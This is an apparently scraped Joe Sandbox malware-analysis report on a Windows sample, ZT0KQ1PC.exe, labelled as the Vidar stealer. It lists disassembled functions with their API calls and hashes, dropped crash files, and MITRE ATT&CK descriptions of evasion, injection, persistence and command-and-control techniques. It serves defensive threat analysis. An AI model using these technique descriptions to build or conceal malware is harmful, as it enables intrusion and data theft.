InternetReadFile.WININET(?,?,000007CF,?), ref: 00407232

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 08da71a86b56b4e40c52e0114086399e6fe31b007248c6dbbc3aea9adab0a47d
Instruction ID: acddfac3ba7d846db26dfe5fa788d2232e99cf475adb3f3554209165c30dde36
Opcode Fuzzy Hash: 08da71a86b56b4e40c52e0114086399e6fe31b007248c6dbbc3aea9adab0a47d
Instruction Fuzzy Hash: C5D01274600105DFEB1C8B29CCA9D6E37A2EF58205B04012CE506671B1F621A402CB10

Function 00409410 Relevance: 1.5, APIs: 1, Instructions: 15filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000000C7,?), ref: 00409422

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 8aeb9c0adf272ccd98a27f13f5ca866da3287b425df8c2346b172561fa8e0423
Instruction ID: dff8c3ac1d519c24ffd77e72a16cf55d06ca6f5dba76713e14204f395067c5a3
Opcode Fuzzy Hash: 8aeb9c0adf272ccd98a27f13f5ca866da3287b425df8c2346b172561fa8e0423
Instruction Fuzzy Hash: 01E0EC31B4A206DFD724DB54CD5DF6A77B6BF54301B144158B11AD7254E620B8028B55

Function 00427380 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Process32Next.KERNEL32(?,?), ref: 0042738E

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: dc757690995eab41cc8e00909a87b442756ce06dc513739273166bbebbb3eefa
Instruction ID: b2ff4ba4cbab8521ec93413e6a62fc350b6e0f774b7d26ba397f47f56a3f70ee
Opcode Fuzzy Hash: dc757690995eab41cc8e00909a87b442756ce06dc513739273166bbebbb3eefa
Instruction Fuzzy Hash: 65D09270316685AFDB49CF58CAA9F6573F0FB44608B08496CE90AC3260E7A4AC15DB45

Function 0041278C Relevance: 1.3, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041279C

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: a2b50b88a378d1797339f89103c98da25683aa193d39742d636b17d7b5b0146b
Instruction ID: da46a9d4fe03d8c8941b207082c71c13cb26c0faf5ee412da43ed8d742a8e5dc
Opcode Fuzzy Hash: a2b50b88a378d1797339f89103c98da25683aa193d39742d636b17d7b5b0146b
Instruction Fuzzy Hash: 1D3150B5A003089FDB14EF69DC81B9977F9BF48301F044869E859D7351E770AA44CF55

Function 0040F488 Relevance: 1.3, APIs: 1, Instructions: 34sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0040F495

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7ba5814330bd228b9785e042f3a8f5a77d3ea101a22a48f0db21d3a0eaa406f
Instruction ID: ef132a0d990ee74375b07e2fc8fcca55463aef5e224cc098bd739752bb0cf51e
Opcode Fuzzy Hash: c7ba5814330bd228b9785e042f3a8f5a77d3ea101a22a48f0db21d3a0eaa406f
Instruction Fuzzy Hash: 30014B75A007099FDB04DFA8DD81A99B7B0BFA9310F144614ED05E7342EB30EAA0CB85

Function 004010B0 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 004010D0

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 73ab59a58ba3b0a45d14f8c538af7c4f5fb358d87ae8756bb7f517068a6f990a
Instruction ID: e754f3d3e7d4b7ec0df0b2dcca311a76620e6690a85d4cc0eb4192306999e2d7
Opcode Fuzzy Hash: 73ab59a58ba3b0a45d14f8c538af7c4f5fb358d87ae8756bb7f517068a6f990a
Instruction Fuzzy Hash: E6E06832601358ABD224B73D8C1883B73EEAF852047158A38EC80CB332FB21DDD186D4

Function 0040F86F Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 0040F887

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: db2582970b5f218cd43f9920e3d330165ad811797a7992555462754c9b385e5e
Instruction ID: e0596f85a1cf36be0a7c5d090d1877fc4419602219a7dbc67eab2777f206858d
Opcode Fuzzy Hash: db2582970b5f218cd43f9920e3d330165ad811797a7992555462754c9b385e5e
Instruction Fuzzy Hash: E3F0AE74200345EFDB4ACF69C4E0E523BA2EB89308B1444A8EE06CB3A1E771E941CB15

Function 00401800 Relevance: 1.3, APIs: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?), ref: 0040180F

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 3ea7dd29aa801f35f8e6ec0af372ede230f028a5aaa29cdc408fc65764b40c6f
Instruction ID: d1d637f652befc7c313ad4ac1f9e50ef102e8d08244b1c22cadd4d3ba3dfb5d3
Opcode Fuzzy Hash: 3ea7dd29aa801f35f8e6ec0af372ede230f028a5aaa29cdc408fc65764b40c6f
Instruction Fuzzy Hash: EED012B37063019BD720CF29CCC19863B67AFD4251B1982B4F514833A6DB32F862CA56

Function 00428E11 Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00428E1C

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 7ab826af0b3c6e193afaf23f0e67286be6e629830d38d6f7abce1d8c22dea139
Instruction ID: acb3541deada4c1490e9b4f57a0c784b1255956184c17e175c6632fb94e5dff8
Opcode Fuzzy Hash: 7ab826af0b3c6e193afaf23f0e67286be6e629830d38d6f7abce1d8c22dea139
Instruction Fuzzy Hash: 6DD01730300642DFDA48CF62C8A8E20B3A2BF88609700816CD60687650EB60B986CB45

Non-executed Functions

Function 004197C0 Relevance: 5.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004197DA
memset.MSVCRT ref: 004197F7
memset.MSVCRT ref: 0041980D
memset.MSVCRT ref: 00419823

Memory Dump Source

Source File: 00000002.00000002.1830362486.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ZT0KQ1PC.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: fefbe6f05b9b638f038f352334744759ae46dd5f8f6908bedd34aa1dd81eef56
Instruction ID: a0d66bda8035d55aaefbff23b984b6f5ed367afcb28488f7b9d51bd43c24d872
Opcode Fuzzy Hash: fefbe6f05b9b638f038f352334744759ae46dd5f8f6908bedd34aa1dd81eef56
Instruction Fuzzy Hash: B51193F1A403046BF710DBD4EC46F9A33B89B44708F144029F708EB2C2E6B5A9198B99

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZT0KQ1PC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Protection of GUI

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ZT0KQ1PC.exe_57cf135b946bfc19e6acf63b86541aefa55268e8_781a0c29_a6445ff7-6e45-4303-bc5f-dc4255df562d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9128.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9242.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9272.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Windows Analysis Report
ZT0KQ1PC.exe

Function 03128631 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 031287AE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 02FB2C3A Relevance: 1.7, APIs: 1, Instructions: 216
memoryCOMMON

Function 02FB06E8 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 0040F070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
fileCOMMON

Function 0040F2B3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
COMMON

Function 0042A3F0 Relevance: 3.0, APIs: 2, Instructions: 26
processCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre